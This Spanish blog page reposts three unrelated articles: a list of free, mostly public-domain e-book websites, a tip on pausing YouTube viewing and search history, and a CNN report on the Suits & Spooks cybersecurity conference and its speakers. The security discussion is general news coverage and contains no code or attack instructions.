Mientras el sector editorial español apuesta por los libros en la nube para combatir las descargas no autorizadas, los lectores disponen de multiples webs que facilitan el acceso a la lectura en pantallas de clásicos digitalizados o descarga de ‘e-books’ de manera gratuita. Recomendamos 10 webs de lectura, de coste cero, en un recorrido que va desde plataformas institucionales a las que promueven la cultura libre.

El impacto mediático que supone el desembarco en España de las plataformas internacionales de venta de e-books (Amazon o Google eBooks, por ejemplo) o las inciativas españolas de Casa del Libro, Círculo de Lectores o 24symbols, quizás ha oscurecido la oferta de lectura de libros libres que existe en internet.

La red propicia múltiples webs de acceso gratuito -o casi gratis- a títulos exentos de derechos de autor o, en su mayoría, clásicos universales. Y un clásico casi nunca defrauda.
La búsqueda nos deriva a instituciones públicas con catálogo digitalizado, a plataformas comerciales de lectura con publicidad o bien a recopilaciones colectivas de internautas sobre páginas web que comparten o facilitan la descarga de libros libres.

Bibliotecas digitales
Una de las instituciones públicas con millones de textos digitalizados es la biblioteca de bibliotecas. Hablamos de la Biblioteca Nacional. Su página web es fuente de consulta para la investigación, pero el gran público también puede leer en pantallas incunables como El Quijote, por ejemplo. Lectura para eruditos e investigadores, pero gratis, al fin de al cabo, cuando se busca clásicos en primera edición.

Otro organismo que promueve la digitalización de incunables, clásicos universales o documentos está en Alicante. Se trata de la Biblioteca Virtual Miguel de Cervantes. Entre los textos digitalizados, podríamos leer en pantallas una buena traducción de William Shakespeare o los grandes clásicos de la literatura, poesía y teatro en lengua española.

Lectura con publicidad
La lectura online desde cualquier dispositivo parece ser que pugna con la compra de e-books bajo descarga. Dos lugares en la red para leer gratis, aunque con la publicidad contextual como invitado, también son Google Books -la plataforma de visualización de libros del megabuscador-, o bien 24symbols, la iniciativa española de lectura en la nube gratis (con publicidad) o mediante suscripción.

En ambos casos, la oferta es limitada a los títulos que las editoriales hayan subido mediante acuerdo. ¿Qué libros leer allí? El Conde de Montecristo (Alejandro Dumas), por ejemplo, o Los cuatro jinetes del apocalipsis (Vicente Blazco Ibáñez).

Clásicos en librerías online
La siguiente alternativa de lectura de e-books gratis no es una web, sino un sector. Son las grandes cadenas de librerías online. Tienen como señuelo comercial el eslógan de “miles de e-books gratis” para todo comprador de un e-reader. Hablamos, claro, de la Casa del Libro, Fnac, Amazon, etc. Las últimas novedades literarias de pago conviven allí con los clásicos de toda la vida, a coste cero.

Cultura libre
En las antípodas de estas instituciones y empresas están otras iniciativas que promueven los libros libres. Un extenso listado colaborativo lo encontramos en el blog de José Jiménez Moltó (más conocido como Kurioso). Su propuesta de recopilar webs de cultura libre sobre cine, televisión o música también se extendió a los libros. Así, seleccionamos dentro del listado, muchísimo más amplio, y recomendamos los siguientes sites y su catálogo de libros libres.

Un euro, un libro
El escritor Juan Gómez Jurado fomentó esta iniciativa de un 1libro1euro.com. Ahora, esta web amplía sus anaqueles digitales y facilita la descarga de títulos como Espía de Dios (Juan Gómez Jurado), Apocalipsis Z, de Manel Loureiro, o Ladrones de historias, de Pablo Nuñez, entre otros. La descarga es a cambio de un donativo por un euro a la oenegé Save The Children.

Una libroteca
La libroteca.net también apuesta por la lectura gratis. Quieren disponer en breve de más de 5.000 títulos libres de derechos en varios idiomas, incluido el español. Alertan al lector que aquí no encontrarán ni a Arturo Pérez-Reverte ni a Stephen King (libros con copyright), pero sí novela y poesía clásicas, ensayos o artículos. Las descargas son en formato .doc o pdf, principalmente.

Conversor gratis
Llegamos a ManyBooks.net. Una excelenta plataforma de búsqueda de libros por idiomas, autor y temática, que embebe el catálogo del archiconocido Proyecto Gutember. Una de sus virtudes es que el usuario llega al libro y decide en qué formato se lo puede descargar (pdf, ePub, etc.). Su clasificación de libros más descargados data de 2008, pero nos muestra qué tipo de lectores visitan esta web. Aquí, los best readers son El Arte de la guerra, El Kama Sutra de la Vatsayayana, Las Aventuras de Sherlock Holmes y Orgullo y prejuicio.

Trueque de libros
El trueque como opción es la fórmula que promueve Libroscompartidos.com. Su web nos invita a registrarnos y regalar aquellos libros –de papel- que desbordan nuestra biblioteca física. Por cada ejemplar entregado, el usuario recibe un crédito. Podemos canjear el crédito por un libro y recibirlo en nuestro domicilio gratis. Ojo, los portes postales corren a cuenta del comprador.

11.000 opciones
Por último, navegamos por Librodot.com para encontrar una extensa biblioteca de más de 11.000 títulos y mil autores en lengua española. La literatura, la antropología, la gastronomía o la ciencia son algunas de sus temáticas.
Estas 10 recomendaciones de webs para leer libros gratis se amplían con muchas más en la lista colectiva de Kurioso.es, de Jiménez Moltó. Su post, #Comparte Cultura, sigue acumulando propuestas.

“Copiar, compartir, regalar cultura es un derecho legítimo que ha existido desde siempre. El respeto a la obra de un autor es igual de necesario que respeten mi derecho a compartir… ya sea a mi padre o a mi hermana o a mis 40.000 followers”, dice Jiménez Moltó.

Fuente: http://noticias.lainformacion.com/arte-cultura-y-espectaculos/literatura/10-paginas-web-para-leer-libros-y-e-books-gratis_V0xL0FiZ2xQfmvGXesQKt2/

Impide que YouTube almacene los videos que has visto y tus búsquedas

Impide que YouTube almacene los videos que has visto y tus búsquedas
Como sabéis, cada vez que vemos un vídeo en YouTube o realizamos una búsqueda, estos datos se quedan almacenados en nuestra cuenta. Siempre que queramos, podemos eliminar esos datos ya sea de manera individual o todos de golpe. Pero si no queríamos que se guarden, hasta ahora no había forma de impedirlo.

Y es que esto ha cambiado. Parece ser que han introducido una nueva característica que nos permite ir más allá del simple borrado del historial de vídeos y búsquedas, sino que también podemos impedir que se registren estos historiales. Reconozco que no sé cuanto tiempo llevará ahí pues no me suelo pasar mucho por la configuración de mi cuenta, aunque parece ser que su aparición es reciente.

Para impedir el almacenamiento de esa información, nos vamos a la configuración de nuestra cuenta y entramos en “Gestor de videos”. Allí, vamos a la sección “Historial”, donde se almacenan los vídeos que hemos visto, y pulsamos el botón “Pause viewing history” (parece que aún no lo han traducido). Para las búsquedas, vamos a “Historial de búsquedas” y pulsamos “Detener el historial de búsquedas” (éste si lo tradujeron).

Recordad que desde allí mismo podemos también eliminar partes o todo el historial por medio de los botones que hay junto a los que he mencionado, cosa recomendable de hacer ya que estamos por allí. De esta forma, si somos muy celosos de nuestra privacidad, ahora ya disponemos de una opción más para tenerla bajo nuestro control, al menos en YoutTube.

Vía | Ghacks

La ciberguerra amenaza la información personal y confidencial

CNN) — Hay una guerra en el ciberespacio. Es enorme, complicada y los soldados no son exactamente los que esperarías.

Para entender sólo una de las maneras en la que esta guerra se realiza, considera el impacto de largo alcance de las redes sociales y una historia que un empleado del Gobierno, quien trabaja para una agencia de defensa de Estados Unidos, expuso recientemente.

La historia habla de una incursión de las Fuerzas Especiales de Estados Unidos en 2009 que involucró a las tropas estadounidenses y con la cual liberaron a un rehén en la que fue considerada una operación de rescate “exitosa” en un lugar sin precisar fuera de Estados Unidos. El problema, dijo el director del programa, cuyo nombre no puede revelarse debido a lo sensible de su trabajo, vino después de que las tropas se retiraron.

En 45 minutos, “los malos” entraron, reorganizaron los cuerpos de los secuestradores que murieron, tomaron fotografías, escribieron un comunicado de prensa y lo publicaron en una red social.

A Estados Unidos le tomó tres días responder.

“El daño ya estaba hecho”, dijo el director.

Ya sea la manipulación de la información, o el robo de información, entender el campo de batalla en el ciberespacio es clave para salvaguardar la información, ya sea de tipo personal, o de una forma más general de seguridad nacional, o del tipo que los empleados del gobierno protegen con nerviosismo; la información de infraestructura crítica, desde sistemas de filtración de agua hasta los sistemas de control de tráfico aéreo que operan con computadores.

“Cuando se trata de estos temas, básicamente todo el mundo miente”, dijo.

Es difícil ser más contundente que eso, pero esa honestidad cruda y frustración eran casi esperadas en la reciente reunión llamada Suits & Spooks (ejecutivos y espías) en Arlington, Virginia. Se anunció como ‘la anticonferencia’.

“Empecé con la premisa que todo el mundo reconoce como verdadera: que no estamos seguros”, dijo el organizador de la conferencia, Jeffrey Carr, quien también es el autor del libro Inside Cyber Warfare (Dentro de la guerra cibernética).

“La estructura de ciberseguridad está completamente rota”.

Para organizar la conferencia, Carr contactó a todas las personas a quienes conoce, y resulta que conoce a personas muy interesantes y diversas.

La lista de invitados incluía a un hacker de 25 años, quien prefiere el título de “investigador independiente de seguridad”; una actriz que actúa en un popular drama de vampiros y está interesada en que los actores protejan su imagen en línea; un exoficial de inteligencia y profesor de Derecho Internacional en la Universidad de Georgetown, y un emprendedor web que inició una empresa de pagos en línea y a quien incluyeron en la lista de los “30 menores de 30” de la revista Forbes.

Una de las empresas patrocinadoras de la conferencia es una compañía que tomó su nombre, Palantir, de la película El señor de los anillos. ¿Ya te lo imaginas?

“Está completamente rota”, dice Carr.

“¿Cómo la arreglamos? Espero que se logre un avance, y muchas de las personas que están aquí son de una agencia de gobierno o de una enorme corporación, así que pueden llevarse esto a casa y empezar a conectar algo con lo que aprendimos en estos días de trabajo. Eso hará que todo se dirija hacia reformar una revolución en asuntos de seguridad, lo que es el objetivo del evento”.

«Hackeando» el problema

El hacker de 25 años, Travis Goodspeed, es fácil de reconocer. El cabello le llega hasta la espalda. Dice que es por su padre, quien leyó un libro de L. Ron Hubbard (fundador de la Iglesia de la Cienciología), y cuando era niño le dijo que el peluquero le cortaría las orejas, sólo para ver si se lo creía. Ahora ya sabe que no, pero comprueba que a veces incluso las cosas más absurdas se quedan contigo. Ahora se gana la vida asesorando a empresas que preferirían que sus clientes crean que hacen negocios de forma segura en el ciberespacio, pero que conocen los riesgos reales, razón por la cual contratan a personas como Goodspeed.

“Un par de empresas me contrataron para mostrarles cómo haría trampa con mis facturas de electricidad, para solucionarlo antes de que le gente haga trampas en sus cuentas de electricidad de la misma forma”, dice Goodspeed.

Mi especialidad es atacar computadoras pequeñas o construir cosas extrañas con ellas. Hay un juguete rosa para niños, y escribo un software nuevo en él, lo que le permite hacer todo tipo de cosas raras. Puedes hacer un analizador de espectros con eso, puedes atacar a un medidor inteligente (de electricidad, gas o agua) con eso, puedes grabar lo que otros tipos de radios están transmitiendo”.

Con una tecnología de autoadaptación similar logró penetrar las medidas de seguridad de un sistema de radiocomunicaciones, dice Goodspeed. El gobierno de Estados Unidos estaba considerando ese sistema para hacer frente a los problemas de comunicación que pudieran surgir entre los primeros en responder después de un ataque terrorista o de otra catástrofe.

Las habilidades de Goodspeed son un poco diferentes a las de otro conferencista, Ben Milne, empresario web y CEO de la empresa de pagos en línea Dwolla.

“Es extremadamente único”, dijo Milne en la conferencia, agregando que la razón por la que asistió es por las preocupaciones que comparten la seguridad nacional y la industria de los negocios digitales.

“Todos quieren ser capaces de reconocer a los malos. Todo, desde el robo de identidad, la protección de la identidad, la protección de datos, cualquiera que maneje datos críticos tiene que lidiar con todos esos problemas y entonces tiene que averiguar cómo analizarlos, responder a ellos e informar sobre ellos. Así que es un flujo bastante complejo, pero todo el mundo que maneja algún punto de ese flujo obviamente está en la sala”.

A lo largo del día, un ingeniero en computación se sentó en la fila de atrás. Mientras escuchaba a los oradores, escribía rápidamente en un teclado, mientras la pantalla al frente de la sala compartía la pantalla de su computadora. A medida que los oradores mencionaban proyectos, o debilidades de las estructuras de seguridad, o incluso los nombres de los grupos que se sabía habían participado en violaciones de seguridad, Scott Stevson, un ingeniero de Palantir, contratista del gobierno estadounidense, empezó a crear vínculos.

Pronto se hizo evidente que lo que este hombre podía hacer con un motor de búsqueda era simplemente temible.

“En este caso estoy usando Google como mi interfaz primaria de búsqueda, porque esta instancia de Palantir que estoy usando no está ligada a lo que nosotros llamaríamos un conjunto de datos empresariales, lo que significa que no tengo un conjunto de datos proporcionado por un cliente. Uso Google y una interfaz que construimos y que me permite llamar a un URL e importarlo a Palantir para crear un documento en el momento”, dijo Stevson.

“Puedes verme destacar a personas, relacionarlas entre sí, y publicar constantemente esos resultados para que de esa manera, si estuviera trabajando con otro equipo de analistas, pudieran jalar también esa información”.

El final del día el mensaje fue cuán interconectados estamos todos en internet, y lo vulnerables que somos todas las personas o cualquier cosa ante los malos del ciberespacio. La mayoría de la gente inteligente que enfrenta este problema está de acuerdo en una cosa: no hay respuestas fáciles para mantener los sistemas completamente seguros.

Actualmente hay decenas de fragmentos de legislación cibernética que abren su camino a través del proceso, impulsando a algunas personas a decir que necesitamos ver el problema de una manera diferente si queremos encontrar una solución viable y efectiva.

Fuente